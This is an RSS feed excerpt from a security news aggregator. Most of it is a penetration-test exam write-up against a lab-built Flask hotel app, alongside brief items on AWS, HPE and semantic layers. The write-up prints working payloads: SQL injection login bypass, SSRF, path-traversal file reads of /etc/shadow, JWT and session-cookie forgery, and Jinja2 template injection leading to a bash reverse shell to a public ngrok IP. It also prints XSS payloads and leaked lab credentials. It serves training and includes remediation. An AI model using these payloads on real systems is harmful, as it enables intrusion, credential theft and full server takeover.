<link>https://tsecurity.de/de/3600292/ai-nachrichten/aws-weekly-roundup-aws-finops-agent-in-preview-gemma-4-on-bedrock-kiro-pro-max-and-more-june-15-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600292/ai-nachrichten/aws-weekly-roundup-aws-finops-agent-in-preview-gemma-4-on-bedrock-kiro-pro-max-and-more-june-15-2026/</guid>
<pubDate>Tue, 16 Jun 2026 00:07:27 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This week, New York City is hosting AWS Summit, bringing together builders, customers, and AWS teams for a full day of announcements, demos, and technical sessions at the Javits Center. I wrote blog posts for some of the Summit launches, so I am excited to see them go live this week. I just won’t be […]]]></content:encoded>
</item>
<item>
<title><![CDATA[HPE Partner Growth Summit Live]]></title>
<description><![CDATA[All the news and announcements from the HPE Partner Growth Summit at HPE Discover 2026]]></description>
<link>https://tsecurity.de/de/3599876/it-security-nachrichten/hpe-partner-growth-summit-live/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599876/it-security-nachrichten/hpe-partner-growth-summit-live/</guid>
<pubDate>Mon, 15 Jun 2026 19:38:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[All the news and announcements from the HPE Partner Growth Summit at HPE Discover 2026]]></content:encoded>
</item>
<item>
<title><![CDATA[My Instructor Said “You Can’t Get a Shell.” I Got Root. — Full Web Pentest Exam Write-Up]]></title>
<description><![CDATA[Author: Shikhali JamalzadeGitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzadsDisclosure Notice: This assessment was conducted as a formal practical examination under the supervision of MilliSec LLC. The target applicationVanguardCorp Hotel Management System — was a purpose-built CTF/...]]></description>
<link>https://tsecurity.de/de/3599548/hacking/my-instructor-said-you-cant-get-a-shell-i-got-root-full-web-pentest-exam-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599548/hacking/my-instructor-said-you-cant-get-a-shell-i-got-root-full-web-pentest-exam-write-up/</guid>
<pubDate>Mon, 15 Jun 2026 17:25:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9bh_vFeJ1vSgMartVf7EoA.png"></figure><h4><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br><strong>GitHub:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="https://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a></h4><blockquote><strong><em>Disclosure Notice:</em></strong><em> This assessment was conducted as a formal practical examination under the supervision of MilliSec LLC. The target application<br>VanguardCorp Hotel Management System — was a purpose-built CTF/exam environment deployed specifically for this assessment on May 24, 2026. No real user data was involved. All exploitation was performed within an isolated lab network. This write-up is published strictly for educational purposes.</em></blockquote><h3>The Setup</h3><p>Before the exam started, my instructor — the person who built the target application from scratch — looked me in the eye and said:</p><blockquote>“You can’t get a shell from this site. I haven’t left that kind of vulnerability.”</blockquote><p>5 minutes later, I had a root shell.</p><p>Not a www-data shell. Not a limited user. Root. uid=0(root). The web application process itself was running as the system's superuser, which meant the moment I achieved code execution, I owned the entire machine at the highest possible privilege level.</p><p>This is the full story of that exam — every finding, every payload, the complete attack chain, and why a five-vulnerability chain starting from a single unauthenticated endpoint ended at full OS compromise.</p><h3>Context</h3><p>This was a practical penetration testing examination conducted at MilliSec LLC on May 24, 2026. The format: black-box. No source code, no credentials, no architecture knowledge. Just an IP address and ten hours.</p><p>The target was the <strong>VanguardCorp Hotel Management System</strong> — a custom-built Flask/Jinja2 web application backed by SQLite and proxied through nginx. The scope covered the full application: authentication, API endpoints, user functionality, administrative panel, and everything in between.</p><p>Parameter Detail Target VanguardCorp Hotel Management System Target IP 82.153.241.96 Attacker IP 10.0.2.5 (isolated lab VM) Technology Stack Python / Flask, Jinja2, SQLite, nginx Assessment Type Black-Box Web Application Penetration Test Assessment Date May 24, 2026 Exclusions Denial of Service; actions beyond demonstration of impact</p><p>The final report documented <strong>ten confirmed vulnerabilities</strong> — five rated Critical, five rated High. CVSS scores ranged from 7.5 to 9.8.</p><p>But the number that mattered most: <strong>1 root shell</strong>.</p><h3>Phase 1: Reconnaissance — Reading the Application</h3><p>The first thing I do on any black-box engagement is just use the application like a normal person. Click everything. Notice what changes in the URL. Watch what headers come back. This phase is slower than running a scanner, but it gives you a mental model that tools can’t.</p><p>The VanguardCorp application presented itself as a hotel management platform: browsable destinations, user registration and login, a booking system, a profile page, reviews, and a legal document section in the footer. The admin panel was accessible at /admin/login.</p><p>Technology fingerprinting gave me:</p><ul><li><strong>Flask</strong> session cookies (identifiable by the eyJ base64 prefix)</li><li><strong>Jinja2</strong> template engine (implied by the Flask stack)</li><li><strong>nginx/1.18.0</strong> reverse proxy on Ubuntu</li><li><strong>SQLite</strong> (confirmed later via LFI)</li><li>A /legal?doc=terms.txt link in the footer — a filename parameter that immediately caught my attention</li></ul><p>That doc parameter is the kind of thing that looks boring on first glance. It isn't.</p><h3>Phase 2: First Blood — SQL Injection on Login</h3><p>The login form was the natural first target. I started with the most fundamental injection test: a single quote in the username field. The application returned a server error rather than a generic “invalid credentials” message — a strong signal that the input was landing directly in a SQL query.</p><h3>F-01 — SQL Injection: Authentication Bypass</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 9.4 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H <br><strong>OWASP</strong> A03:2021 — Injection <br><strong>Affected</strong> /login and /admin/login</p><p>The payload was as simple as it gets:</p><pre>Username: ' OR '1'='1' --<br>Password: anything</pre><p>The application returned a valid authenticated session for the first user record in the database. I applied the same payload to /admin/login.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*Ry1S0bkmF6yes8Z7Jqzg_Q.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*_BarRyDHEw3dQcjG8p-cAQ.png"></figure><p>The redirect landed me on the full administrative control panel.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*y4frar_fnufqABjbYv8E5Q.png"></figure><p>The admin panel exposed a live dashboard showing registered clients, active properties, total reservations, and gross revenue — plus a full client inquiry log that already contained SQL injection payloads submitted by other testers during prior sessions. I was not the first person to find this.</p><p><strong>Why this works:</strong> The login handler constructs a SQL query by string-concatenating the user-supplied username directly into the query body. The injected OR '1'='1' makes the WHERE clause always evaluate to true, returning the first row in the users table. The -- comment sequence discards everything after it, including the password check.</p><p><strong>Remediation:</strong> Replace dynamic SQL with parameterised queries or prepared statements. One-line fix at the database layer.</p><h3>Phase 3: SSRF — The Application Talks to Itself</h3><p>With admin access established, I turned to the API endpoints. The resort preview functionality accepted a URL parameter and fetched its content server-side — a textbook Server-Side Request Forgery surface.</p><h3>F-02 — Server-Side Request Forgery (SSRF)</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N <br><strong>OWASP</strong> A10:2021 — Server-Side Request Forgery <br><strong>Affected</strong> /api/v1/resort/preview?url= <br><strong>Flags</strong> CTF{SSRF_gives_internal_access} | CTF{SSRF_env_disclosure}</p><p>I directed the server to request its own loopback interface:</p><pre>GET /api/v1/resort/preview?url=http://127.0.0.1/internal/config</pre><p>The server returned its own internal configuration page — exposing the Flask session secret key, the JWT signing secret, and the admin password in a single request.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*e3zI-5p8glPXdoZqE0eTsA.png"></figure><p>A second request to the debug endpoint returned process environment variables:</p><pre>GET /api/v1/resort/preview?url=http://127.0.0.1/debug/env</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*6q10xmYCfjVoGphdwx-Efw.png"></figure><p><strong>Credentials and secrets obtained at this stage:</strong></p><p>Secret Value Admin password VanguardCorpAdmin2026! Flask session secret key vanguard_horizon_secret_2026 JWT signing secret secret</p><p>These three values became the keys to everything that followed.</p><h3>Phase 4: LFI — Reading the Server From the Inside</h3><p>That doc parameter from the footer had been waiting for me. The application served legal documents by reading filenames from the URL — with no path sanitisation whatsoever.</p><h3>F-03 — Local File Inclusion (LFI): Source Code and File Exposure</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 8.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N <br><strong>OWASP</strong> A01:2021 — Broken Access Control <br><strong>Affected</strong> /legal?doc= parameter</p><p>Path traversal payloads worked immediately:</p><pre># System user list<br>GET /legal?doc=%2Fetc%2Fpasswd</pre><pre># Shadow file — root password hash<br>GET /legal?doc=%2Fetc%2Fshadow</pre><pre># Flask source code<br>GET /legal?doc=%2Froot%2Fapp.py</pre><pre># SQLite database<br>GET /legal?doc=%2Froot%2Fvanguard.db</pre><pre># Bash history<br>GET /legal?doc=%2Froot%2F.bash_history</pre><pre># Process environment<br>GET /legal?doc=%2Fproc%2Fself%2Fenviron</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*tm_-3ybVUCE_fQv9kK5zJg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*XIDRmt4ccqobr59e4x6iiA.png"></figure><p>/etc/passwd already told me something critical: the web application process was running as root. That single fact meant that any code execution I achieved would immediately be root-level.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*1zW4wdv77Drefy1Ovy8Dzw.png"></figure><p>The full source confirmed what SSRF had already leaked: app.secret_key = "vanguard_horizon_secret_2026". It also revealed the SSTI vector — but more on that shortly.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*P13mBXSon6ss6em_qPB2iw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*KpVvFIRAoIqOZ8XrHE52hA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pbJZVCODB0KaVcELsTQ34w.png"></figure><p><strong>Complete file exfiltration summary:</strong></p><p>File Content /etc/passwd Full system user list — process confirmed running as root /etc/shadow Root user password hash exposed /root/app.py Complete Flask source — all routes, secret keys, business logic /root/vanguard.db Full database — all users, invoices, hotel data, credentials /root/.bash_history Server setup commands — confirmed Python/Flask/SQLite stack /proc/self/environ Process environment — additional configuration disclosure</p><p><strong>Remediation:</strong> Validate all filename input server-side. Resolve the absolute path and confirm it sits within the permitted base directory before reading. Never run the web process as root.</p><h3>Phase 5: JWT Forgery — Becoming Superadmin</h3><p>With the JWT signing secret confirmed as secret, forging a privileged token was a one-liner.</p><h3>F-04 — JWT Weak Secret: Token Forgery</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 8.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N <br><strong>OWASP</strong> A02:2021 — Cryptographic Failures <br><strong>Affected</strong> POST /api/v1/token — JWT issuance and verification <br><strong>Flag</strong> CTF{JWT_alg_none_is_never_safe}</p><pre>python3 -c "<br>import jwt<br>payload = {'user_id': 1, 'username': 'admin', 'role': 'superadmin'}<br>token = jwt.encode(payload, 'secret', algorithm='HS256')<br>print(token)<br>"</pre><pre>curl -H "Authorization: Bearer &lt;FORGED_TOKEN&gt;" \<br>  http://82.153.241.96/api/v1/admin/data</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*eQZtPG04rqWgvc1vh3epDw.png"></figure><p>The API returned the full user database and confirmed CTF{JWT_alg_none_is_never_safe}.</p><p><strong>Why this is catastrophic:</strong> A JWT signed with a weak, guessable, or exposed secret is not a security control — it is a signed permission slip that anyone can forge. The moment the secret leaks (via SSRF, LFI, source code, or a disgruntled employee), every JWT-protected endpoint in the application is fully compromised.</p><h3>Phase 6: SSTI — “You Can’t Get a Shell”</h3><p>This is where the exam got interesting.</p><p>The source code I retrieved via LFI contained the profile route:</p><pre>template = """...""" + session["username"] + """..."""<br>return render_template_string(template, ...)</pre><p>The username value from the Flask session cookie was being <strong>concatenated directly into a Jinja2 template string</strong> before rendering. This is Server-Side Template Injection — any Jinja2 expression in the username gets evaluated server-side.</p><p>But to exploit this, I needed two things I already had:</p><ol><li>The Flask session secret key — to forge a signed session cookie with a malicious username</li><li>Code execution context — to run OS commands</li></ol><p>Both were already in my hands from SSRF and LFI.</p><h3>F-05 — Server-Side Template Injection (SSTI): Remote Code Execution</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H <br><strong>OWASP</strong> A03:2021 — Injection <br><strong>Affected</strong> /profile — Flask session username rendered via render_template_string() <br><strong>Status</strong> Confirmed — RCE achieved as <strong>root</strong></p><p><strong>Step 1: Confirm SSTI</strong></p><p>First, I verified template evaluation with a benign arithmetic payload. I forged a session cookie with username = {{7*7}} using the known Flask secret:</p><pre>from flask import Flask<br>from flask.sessions import SecureCookieSessionInterface</pre><pre>app = Flask(__name__)<br>app.secret_key = "vanguard_horizon_secret_2026"</pre><pre>payload = "{{7*7}}"</pre><pre>s = SecureCookieSessionInterface().get_signing_serializer(app)<br>print(s.dumps({<br>    "role": "admin",<br>    "user_id": 1,<br>    "username": payload,<br>    "verified": True<br>}))</pre><pre>curl -s -b "session=&lt;FORGED_COOKIE&gt;" http://82.153.241.96/profile</pre><p>The profile page rendered <strong>Client Dossier: 49</strong>. Template evaluation confirmed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*gR7BpOC_81S3kEVWUqyq5w.png"></figure><p><strong>Step 2: RCE via OS command execution</strong></p><p>With SSTI confirmed, I escalated to OS command execution using the Jinja2 config object to access the os module:</p><pre>payload = r"""{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"""</pre><p>The server returned uid=0(root) gid=0(root) groups=0(root).</p><p>My instructor had said shell access was impossible. The server was running as root, and I had code execution.</p><p><strong>Step 3: Reverse shell via ngrok tunnel</strong></p><p>Here is where the real challenge started. My attacker machine was behind NAT — 192.168.0.36 is a private address unreachable from the internet. A standard reverse shell to a local IP would never connect back.</p><p>The solution: tunnel the reverse shell through ngrok, which exposes a local listener to the internet via a public TCP endpoint.</p><p>After configuring ngrok with an auth token and opening a TCP tunnel on port 4444:</p><pre>./ngrok tcp 4444<br># Output: Forwarding tcp://0.tcp.in.ngrok.io:20699 -&gt; localhost:4444</pre><p>With the public ngrok address in hand, I crafted the reverse shell payload. The key was that bash -i &gt;&amp; /dev/tcp/HOST/PORT doesn't resolve domain names natively — it needs a direct IP. I resolved the ngrok address first:</p><pre>nslookup 0.tcp.in.ngrok.io<br># 3.6.231.193</pre><p>Then built the complete forged session cookie with the base64-encoded reverse shell:</p><pre>from flask import Flask<br>from flask.sessions import SecureCookieSessionInterface<br>import base64</pre><pre>app = Flask(__name__)<br>app.secret_key = "vanguard_horizon_secret_2026"</pre><pre>cmd = "bash -i &gt;&amp; /dev/tcp/3.6.231.193/20699 0&gt;&amp;1"<br>b64 = base64.b64encode(cmd.encode()).decode()</pre><pre>payload = "{{config.__class__.__init__.__globals__['os'].popen('echo " + b64 + "|base64 -d|bash').read()}}"</pre><pre>s = SecureCookieSessionInterface().get_signing_serializer(app)<br>print(s.dumps({<br>    "role": "admin",<br>    "user_id": 1,<br>    "username": payload,<br>    "verified": True<br>}))</pre><pre># TAB 1 — Listener<br>nc -lnvp 4444</pre><pre># TAB 2 — Trigger the payload<br>curl -s -b "session=$SHELL_COOKIE" <a href="http://82.153.241.96/profile">http://82.153.241.96/profile</a></pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/975/1*xpB4zFxpc1EIBHCMfZah_A.png"></figure><p>The listener received the connection.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/975/1*vJ0QFox_i3VIY3P8GoDpXg.png"></figure><pre>root@82.153.241.96:~# id<br>uid=0(root) gid=0(root) groups=0(root)<br>root@82.153.241.96:~# whoami<br>root</pre><p><strong>Full OS compromise. As root.</strong></p><p>The web application was running as the system superuser — meaning there was no privilege escalation step required. The moment code execution was achieved via SSTI, I had the highest possible access level on the machine.</p><p><strong>The extra finding here:</strong> A web application should never run as root. Even if SSTI had been patched, a correctly configured server would limit the impact of any future RCE to a low-privilege www-data or application user. Running as root amplifies every code execution vulnerability to full system compromise with zero additional steps.</p><p><strong>Remediation:</strong></p><pre># Vulnerable:<br>return render_template_string("Hello " + session['username'])</pre><pre># Safe:<br>return render_template_string("Hello {{ name }}", name=session['username'])</pre><p>Never concatenate user-controlled data into template strings. Run the web process as a dedicated low-privilege user, never root.</p><h3>Phase 7: The Remaining Findings</h3><p>With the crown jewel secured, I documented the remaining vulnerabilities methodically.</p><h3>F-06 — Stored Cross-Site Scripting (XSS)</h3><p><strong>Severity</strong> HIGH — CVSS 8.2 <br><strong>Affected</strong> Review submission form — rendered in admin panel</p><p>The review form accepted raw HTML without sanitisation. Submitted payloads persisted in the database and executed in the administrator’s browser when viewing the review management page.</p><pre>&lt;img src=x onerror=alert(XSS)&gt;</pre><p><strong>Impact:</strong> An attacker can steal admin session cookies, perform actions on behalf of the administrator, or redirect to phishing pages — all triggered the moment an admin loads the reviews page.</p><h3>F-07 — Reflected Cross-Site Scripting (XSS)</h3><p><strong>Severity</strong> HIGH — CVSS 7.5 <br><strong>Affected</strong> /search?q= parameter</p><p>The search endpoint reflected the q parameter directly into the HTML response without encoding.</p><pre>GET /search?q=&lt;script&gt;alert(XSS)&lt;/script&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*n0CBFnDML1ktNBj_nBm06Q.png"></figure><p><strong>Remediation:</strong> Encode all reflected query parameter values before HTML output. Implement a Content Security Policy header.</p><h3>F-08 — Insecure Direct Object Reference (IDOR): Invoice Enumeration</h3><p><strong>Severity</strong> HIGH — CVSS 8.1 <br><strong>Affected</strong> /invoice?invoice_id= parameter</p><p>The invoice endpoint returned records based on a numeric ID without verifying that the requesting user owned the record. Sequential enumeration exposed all invoices across all users.</p><pre>/invoice?invoice_id=1   → my invoice<br>/invoice?invoice_id=2   → Client 1's invoice<br>/invoice?invoice_id=3   → Client 2's invoice<br>...</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kuSSiw5zY3nmrfx9CJbZug.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*s8INoofVNwpWpRrkctvYHA.png"></figure><p><strong>Remediation:</strong> Enforce object-level authorisation on every retrieval. Verify the authenticated user’s ID matches the record owner before returning data.</p><h3>F-09 — Missing Authentication on API Endpoint</h3><p><strong>Severity</strong> HIGH — CVSS 8.6 <br><strong>Affected</strong> DELETE /api/v1/hotels/&lt;id&gt; <br><strong>Flag</strong> CTF{missing_auth_on_api_endpoint}</p><p>The hotel DELETE endpoint performed no authentication or authorisation check. Any unauthenticated client could permanently remove hotel records.</p><pre>curl -X DELETE http://82.153.241.96/api/v1/hotels/1<br># Response: HTTP 200 — hotel record permanently deleted</pre><p><strong>Remediation:</strong> Apply mandatory authentication middleware to all state-mutating API routes (POST, PUT, PATCH, DELETE).</p><h3>F-10 — Sensitive Data Exposure: Hardcoded Secrets</h3><p><strong>Severity</strong> HIGH — CVSS 7.7 <br><strong>Affected</strong> Source code and database exfiltrated via LFI (F-03)</p><p>The source code contained hardcoded Flask secret key and JWT signing secret. The database contained plaintext credentials for all users. These were accessible via LFI and SSRF independently.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZIkGKLV8Ob-h2pc6XsaDjA.png"></figure><p><strong>Credentials exposed:</strong></p><p>Flask session secret key vanguard_horizon_secret_2026 JWT signing secret secret Admin password VanguardCorpAdmin2026! Superadmin password SuperSecret99!</p><p><strong>Remediation:</strong> Never hardcode secrets in source code. Store all sensitive configuration in server-side environment variables. Rotate all exposed credentials immediately.</p><h3>The Complete Attack Chain</h3><p>The ten vulnerabilities do not exist in isolation. Here is the exact execution path — from unauthenticated visitor to root shell:</p><pre>[Attacker — No credentials, no prior knowledge]<br>        │<br>        ▼<br>[1] Application recon → identify Flask sessions, /legal?doc= parameter, <br>    SSRF endpoint at /api/v1/resort/preview?url=<br>        │<br>        ▼<br>[2] SQL Injection → POST /login and /admin/login<br>    Payload: ' OR '1'='1' --<br>    Result:  Full admin session, no credentials required   [F-01]<br>        │<br>        ▼<br>[3] SSRF → GET /api/v1/resort/preview?url=http://127.0.0.1/internal/config<br>    Result:  Flask secret key + JWT secret + admin password<br>             CTF{SSRF_gives_internal_access}               [F-02]<br>        │<br>        ├──────────────────────────────────────────────────────────┐<br>        ▼                                                          ▼<br>[4] LFI → GET /legal?doc=%2Froot%2Fapp.py           [4b] JWT Forgery<br>    Result: Full source code → confirms SSTI vector        Forge superadmin token<br>            GET /legal?doc=%2Fetc%2Fpasswd               with signing secret<br>            → process running as root confirmed            CTF{JWT_alg_none_is_never_safe}<br>            GET /legal?doc=%2Froot%2Fvanguard.db   [F-04]<br>            → full database dump               [F-03]<br>        │<br>        ▼<br>[5] SSTI via forged Flask session cookie<br>    username = {{config.__class__.__init__.__globals__['os'].popen('id').read()}}<br>    → id: uid=0(root)                                       [F-05]<br>        │<br>        ▼<br>[6] Reverse shell via ngrok TCP tunnel<br>    cmd = "bash -i &gt;&amp; /dev/tcp/&lt;NGROK_IP&gt;/20699 0&gt;&amp;1"<br>    Encode → base64 | base64 -d | bash<br>    → Listener receives connection<br>        │<br>        ▼<br>[7] root@82.153.241.96:~# whoami<br>    root<br>    ══════════════════════════════<br>    FULL OS COMPROMISE AS ROOT<br>    ══════════════════════════════</pre><p><strong>The chain in plain English:</strong></p><ol><li>SQLi gave admin access with no credentials.</li><li>SSRF leaked the Flask secret key and JWT secret from the server’s own internal config.</li><li>LFI provided full source code confirming the SSTI vulnerability in the profile route.</li><li>With the Flask secret, I forged a session cookie with a Jinja2 OS command payload as the username.</li><li>The server evaluated the payload and executed it as root — because the process had never been stripped of root privileges.</li><li>ngrok tunneled the reverse shell past NAT, and the connection landed on my listener.</li></ol><p>Each vulnerability alone is serious. Chained together, they form a straight line from zero to root.</p><h3>The “Impossible” Shell</h3><p>Let me come back to the statement that opened this write-up.</p><p>My instructor said shell access was not possible. What he likely meant was that there was no obvious command injection, no file upload with execution, no traditional RCE surface visible from standard black-box testing. He was right about the obvious paths.</p><p>What he hadn’t accounted for was the chain:</p><ul><li>SSRF leaking the Flask secret key</li><li>LFI confirming the source code’s SSTI vulnerability</li><li>The combination of those two facts enabling session cookie forgery with a Jinja2 payload</li></ul><p>Each of these findings seemed independent. But the moment you chain SSRF → LFI → SSTI, you have arbitrary code execution. And when the web process runs as root, you have the entire machine.</p><p>The lesson is one that applies to every penetration test: the absence of a single obvious RCE vector does not mean RCE is impossible. It means the path may require more steps.</p><h3>Remediation Priority Roadmap</h3><p><strong>Immediate — 24 hours</strong></p><p><strong>1 · F-01 · SQL Injection</strong> Replace all dynamically constructed SQL queries with parameterised queries or prepared statements.</p><p><strong>2 · F-05 · SSTI / RCE</strong> Pass template variables by context — never concatenate user input into template strings. Run the web process as a dedicated non-root user.</p><p><strong>3 · F-04 · JWT Weak Secret</strong> Rotate the signing secret immediately. Enforce a cryptographically random minimum 256-bit key stored in environment variables, never in source code.</p><p><strong>Urgent — 72 hours</strong></p><p><strong>4 · F-03 · Local File Inclusion</strong> Validate and sanitise all filename parameters. Resolve absolute paths and confirm they reside within the permitted base directory before any file read.</p><p><strong>5 · F-02 · SSRF</strong> Implement an allowlist of permitted outbound destination URLs. Block all requests to RFC 1918 private ranges and loopback addresses. Disable debug and internal config endpoints in production.</p><p><strong>6 · F-10 · Sensitive Data Exposure</strong> Remove all hardcoded secrets from source code. Rotate every exposed credential and secret key immediately following this report.</p><p><strong>High — 1 week</strong></p><p><strong>7 · F-09 · Missing Authentication on API</strong> Apply mandatory authentication middleware to all state-mutating API routes: DELETE, PUT, PATCH, POST.</p><p><strong>8 · F-06 · Stored XSS</strong> Sanitise all user-supplied HTML server-side before database storage. Implement a strict Content Security Policy header.</p><p><strong>9 · F-08 · IDOR</strong> Enforce object-level authorisation on every invoice and resource retrieval. Verify the authenticated user’s ID matches the record owner before returning data.</p><p><strong>Medium — 2 weeks</strong></p><p><strong>10 · F-07 · Reflected XSS</strong> Encode all user-supplied query parameter values before inserting them into HTML responses.</p><h3>Key Takeaways for Developers</h3><p><strong>1. Never run a web application as root.</strong> If code execution is ever achieved — through any vulnerability, at any severity level — a root-running process turns that into immediate full system compromise. Use a dedicated low-privilege service user. Always.</p><p><strong>2. Never concatenate user input into template strings.</strong> Jinja2’s power is its flexibility. That flexibility becomes a weapon the moment user-controlled data enters the template context unseparated from the template logic itself. Pass all user data as context variables with the name=value syntax. Never concatenate.</p><p><strong>3. SSRF can expose secrets that enable completely separate attack chains.</strong> SSRF is often treated as a moderate finding because the direct impact feels limited. In this case, a single SSRF request to /internal/config handed over the keys to JWT forgery and SSTI exploitation. SSRF that can reach internal metadata endpoints or configuration services deserves Critical severity.</p><p><strong>4. LFI on a root-owned process is a full credential dump.</strong> /etc/shadow, database files, source code, .bash_history — all of it is readable when the process runs with unrestricted filesystem access. LFI severity scales directly with the process's OS privilege level.</p><p><strong>5. Secrets in source code cannot be rotated without a deployment.</strong> A secret hardcoded in app.py is exposed every time the source is read — via LFI, version control misconfiguration, or any future breach. Secrets belong in environment variables, managed through a proper secrets store, and rotated independently of code changes.</p><p><strong>6. Test all combinations, not just individual findings.</strong> The individual vulnerabilities here ranged from serious to severe. But their combined impact — a fully unobstructed path from unauthenticated access to root OS compromise — was only visible by tracing the chain. Penetration testing is about attack paths, not checklists.</p><h3>Final Thoughts</h3><p>This exam ran for ten hours. At the end of it, I had documented ten confirmed vulnerabilities and a root shell on a machine I was told couldn’t be compromised that way.</p><p>That quote — <em>“</em>You Can’t Get a Shell<em>”</em> — wasn’t said to challenge me. It was a genuine belief about the application’s security posture. And that belief was wrong, not because the application had obvious flaws, but because the combination of a leaked Flask secret, an SSTI vector in the profile route, and a process running as root formed a path that wasn’t visible from any single angle.</p><p>The three systemic failures that made this possible:</p><ol><li><strong>No input validation</strong> — SQL queries, template strings, and file paths all accepted user input without sanitisation.</li><li><strong>Hardcoded secrets in source code</strong> — One SSRF or LFI request was enough to recover everything needed for session forgery and token fabrication.</li><li><strong>Root execution</strong> — The web process running as root transformed every code execution path, regardless of how it was reached, into full system compromise.</li></ol><p>All of these are fixable. Most of them in hours. The gap between a vulnerable application and a secure one is often smaller than it looks from the outside — which is exactly why testing matters.</p><p><em>Assessment conducted under MilliSec LLC examination supervision. All exploitation performed on an authorized target within an isolated lab environment. Never test systems you do not own or have explicit authorization to test.</em></p><p><em>If this was useful, connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a82c804ce8e2" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/my-instructor-said-you-cant-get-a-shell-i-got-root-full-web-pentest-exam-write-up-a82c804ce8e2">My Instructor Said “You Can’t Get a Shell.” I Got Root. — Full Web Pentest Exam Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Universal semantic layers: critical infrastructure or the next data fabric?]]></title>
<description><![CDATA[We’re finding out that context is everything when it comes to successful enterprise AI deployments. Removing ambiguity, and working around agreed definitions and vocabularies are essential as agentic AI starts to become more autonomous. At their recent data and analytics summit, Gartner predicted...]]></description>
<link>https://tsecurity.de/de/3598712/it-security-nachrichten/universal-semantic-layers-critical-infrastructure-or-the-next-data-fabric/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598712/it-security-nachrichten/universal-semantic-layers-critical-infrastructure-or-the-next-data-fabric/</guid>
<pubDate>Mon, 15 Jun 2026 12:05:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>We’re finding out that context is everything when it comes to successful enterprise AI deployments. Removing ambiguity, and working around agreed definitions and vocabularies are essential as agentic AI starts to become more autonomous. At their recent data and analytics summit, <a href="https://www.gartner.com/en/newsroom/press-releases/2026-03-11-gartner-announces-top-predictions-for-data-and-analytics-in-2026" rel="nofollow">Gartner predicted</a> that by 2030, USLs will be treated as critical infrastructure alongside data platforms and cybersecurity, and that 44% of data and analytics leaders have already implemented semantic layers, with a further 48% planning to by 2027.</p>



<p>But CIOs have been here before. Data fabric, data mesh, lakehouses, and active metadata were each promoted as critical enterprise infrastructure on previous Gartner cycles, and each has since been absorbed into adjacent products, or quietly forgotten. The <a href="https://www.cio.com/article/4159773/your-ai-agent-is-ready-to-go-is-your-infrastructure.html?utm=hybrid_search">semantic layer</a> is a more concrete capability than any of those, but before treating predictions as a buying signal, it’s worth pressure-testing the claim.</p>



<h2 class="wp-block-heading">What a true semantic layer looks like</h2>



<p>Ben Clinch, leading AI, data, and architecture community advocate at the EDM Association and DAMA-UK, sees the strategic value of trusted semantic layers.</p>



